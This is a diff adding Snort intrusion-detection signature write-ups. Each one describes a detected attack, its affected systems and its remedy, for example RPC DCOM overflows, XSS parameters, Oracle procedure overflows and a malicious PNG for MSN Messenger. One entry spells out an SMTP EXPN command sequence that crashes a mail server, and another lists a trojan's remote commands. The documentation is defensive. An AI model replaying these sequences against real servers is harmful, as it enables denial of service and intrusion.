+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3130.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3130
+
+--
+Summary:
+This alert is generated when a malicious PNG file is sent to an MSN Messenger
+client. Vulnerable clients which receive such a file are vulnerable to remote
+code execution attacks.
+
+--
+Impact:
+Arbitrary code may be executed in the context of the user running MSN Messenger.
+Their messenger client may or may not crash, depending upon the way the PNG file
+is written.
+
+--
+Detailed Information:
+This vulnerability is due to a buffer overflow in the processing of tRNS chunks
+of PNG files. In order to trigger the overflow, the color type field of the IHDR
+chunk must be set to 0x03, and the length of the tRNS chunk must be greater than
+256. 
+
+--
+Affected Systems:
+	MSN Messenger 6.1
+	MSN Messenger 6.2
+
+--
+Attack Scenarios:
+An attacker may send a malicious PNG through a direct file transfer, as a
+thumbnail for a file transfer, as a custom emoticon, or by setting their buddy
+icon to be the malicious PNG. In all cases, the PNG is sent via an MSN file
+transfer.
+
+--
+Ease of Attack:
+Very simple. Example PNGs with shellcode are available on the web, and attacking
+via all but the file transfer thumbnail vector is accomplished with simple,
+everyday MSN Messenger tasks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+Thumbnails of image transfers are sent in an encoded format. As a result, they
+cannot be detected. However, making the thumbnail contain malicious data is
+exponentially more difficult than any of the other attack vectors, as an
+attacker cannot manually specify the thumbnail to be sent.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3397.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3397
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3387.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3387
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1998.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1998
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the file
+calendar.php. Multiple applications are vulnerable to SQL injection
+techniques that may lead to the execution of SQL code of the attackers
+choosing.
+
+--
+Affected Systems:
+	All systems running PHP calendar applications
+	VBulletin
+	Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can manipulate user supplied variables to include SQL code
+of their choosing in the request to a vulnerable application.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3280.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3280
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000565.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000565
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "action" parameter in the "show.php" script 
+used by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2450.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2450
+
+--
+Summary:
+This event is generated when a user in your network has successfully logged into Yahoo Instant Messenger.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A user must successfully logon to an Yahoo Instant Messenger server before participating in any exchanges, such sending or receiving messages, files, or webcams, or chatting by voice.  Many of these activities are not appropriate in a corporate environment.  Also, the exchanges are transacted via Yahoo IM servers so there is no assurance of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+Once logged in, a Yahoo IM user may unwittingly accept a malicious file that may contain a worm, virus, Trojan, or backdoor to name a few.
+
+--
+Ease of Attack:
+Easy. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2646.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2646
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_offline" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
--- /dev/null
+++ b/doc/signatures/1877.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1877
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1565.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1565
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3275.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3275
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000797.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000797
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c2" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2449.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2449
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with Ipswitch WS FTP ALLO command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges. A Denial of Service (DoS)
+attack may also be possible.
+
+--
+Detailed Information:
+Ipswitch WS FTP is an FTP server. A vulnerability exists with the ALLO 
+command that can cause a buffer overflow and permit the execution of 
+arbitrary commands with system privileges. The buffer overflow can be 
+caused by supplying an overly long argument to the ALLO command.
+
+--
+Affected Systems:
+	Ipswitch WS FTP Server 1.0.1 through 1.0.5, 2.0 through 2.0.4, 
+	3.0 1, 3.0, 3.1, 3.1.1, 3.1.2, 3.1.3, 3.4, 4.0 2, 4.0 1 and 4.0
+	Ipswitch WS_FTP Pro 6.0, 7.5, 8.0 3, 8.0 2
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2617.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2617
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_mview_propagation" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/1295.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid:
+1295 
+
+--
+Summary: 
+This event is generated when traffic containing the RICHED20.DLL file is
+detected. This may indicate Nimda worm activity.
+
+--
+Impact:
+Possible infection by the Nimda virus.
+
+--
+Detailed Information:
+Nimda spreads by file infection, mass emailer, file share, or IIS unicode exploit 
+to attack unpatched systems.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows 2000
+
+--
+Attack Scenarios:
+An unpatched server is connected to the internet and is infected or
+an infected email is opened. Once infected the worm spreads itself.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Application/User may access the Microsoft RichEdit control across the 
+network causing a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+Microsoft:
+http://msdn.microsoft.com/library/en-us/vclib/html/vclrfafxinitrichedit2.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1404.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000564.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000564
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "search" parameter in the "show.php" script 
+used by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000138.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+100000138
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Information Server (IIS).
+
+-- 
+Impact: 
+Serious. Information Disclosure, application source code may be disclosed.
+
+--
+Detailed Information:
+A programming error in an error page for Microsoft IIS may result in the 
+discloure of asp code disclosure on an affected system.
+
+By making a request to a server using a modified SERVER_NAME variable, the 
+underlying asp code is displayed in the error page returned to the requestor if 
+the asp page generates an error.
+
+--
+Affected Systems:
+Microsoft IIS 6.0 and prior
+
+--
+Attack Scenarios: 
+An attacker can make a request to the server and modify the SERVER_NAME 
+variable to be either localhost or 127.0.0.1, if the page returns an error the 
+asp code is revealed.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1450.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+
+1450
+
+--
+Summary:
+This event is generated when an attempt is made to send a malformed
+request to an SMTP server which may cause a Denial of Service.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+The SMTP standard command "EXPN" is provided by servers to help find
+user e-mail accounts.
+
+A malformed request to certain versions of Vintra MailServer can cause a
+DoS against that server.
+ 
+--
+Affected Systems:
+
+Vixar MailServer for Windows
+
+--
+Attack Scenarios:
+The attacker needs to connect to a vulnerable server and issue the
+following commands.
+
+>telnet victim.foo.com 25
+>helo victim
+>mail from:doctor
+>rcpt to:evil
+>expn *@
+
+--
+Ease of Attack:
+
+Simple. No exploit software required.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Disable the EXPN command on the SMTP server.
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Extra information from Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+NT Bugtraq:
+http://marc.theaimsgroup.com/?l=ntbugtraq&m=90222454131610&w=2
+
+Command Reference:
+http://www.ntmail.co.uk/kb.htm?q=980
+
+--
--- /dev/null
+++ b/doc/signatures/3016.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+3016
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection on port 63536 using the Insane Network 4.0 trojan.
+
+-- 
+
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+Insane Network 4.0 uses port 2000 as its default, but -2000, or port 63536, incarnations also exist.
+Insane Network 4.0 has a number of functions. The following strings are indicative of a particular Insane Network 4.0 attack.
+Be aware that some versions of Insane Network 4.0 will send their attack strings one letter at a time. For example,
+to send the bomb command, some versions will send only one letter per packet, resulting in bomb being spelled out in multiple packets.
+
+Format: Name of function (Description of what it does *only if necessary*) - string to look for
+
+Bomb ("Bombs" monitor) - bomb
+Snow (Makes monitor snowy) - snow
+Melt ("Melts" the screen) - melt
+Reverse (Reverses screen) - reverse
+Copy File - cp followed by a file name and the destination path
+Ctrl-Alt-Del (Enable/Disable Ctrl-Alt-Del) - cad -e (for enable) cad -d (for disable)
+Delete File - rm followed by a file name, including path
+File List - ls followed by directory
+File Sharing (Gets shared file password information) - share
+Dial-Up Passwords (Get Dial-up password information) - passwd
+Make Text File - mktext
+Popup Message - popup
+Read File - cat followed by a file name, including path
+Reboot - reboot
+Registry Edit - regrun
+Rename File - ren followed by a file and its new name
+Run File - exec followed by a file name, including path
+Shutdown - shutdown
+Taskbar (Enable/Disable Task Bar) - task -e (for enable) tast -d (for disable)
+Telnet - telnet
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 2000), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove insane network.exe and commands.txt
+Kill insane network.exe in the process list
+
+Keep your anti-virus software updated with the latest virus definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/i/insane_network.asp
+
+
+--
--- /dev/null
+++ b/doc/signatures/2989.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2989
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the Windows
+registry service via SMB. 
+
+--
+Impact:
+Serious. Remote administration of the Windows reqistry may be possible.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to bind to the Windows
+registry service via SMB across the network.
+
+It may be possible for an attacker to manipulate the Windows registry
+from a remote location. This could give the attacker administrative
+privileges on the target host as well as the opportunity to execute code
+of their choosing.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
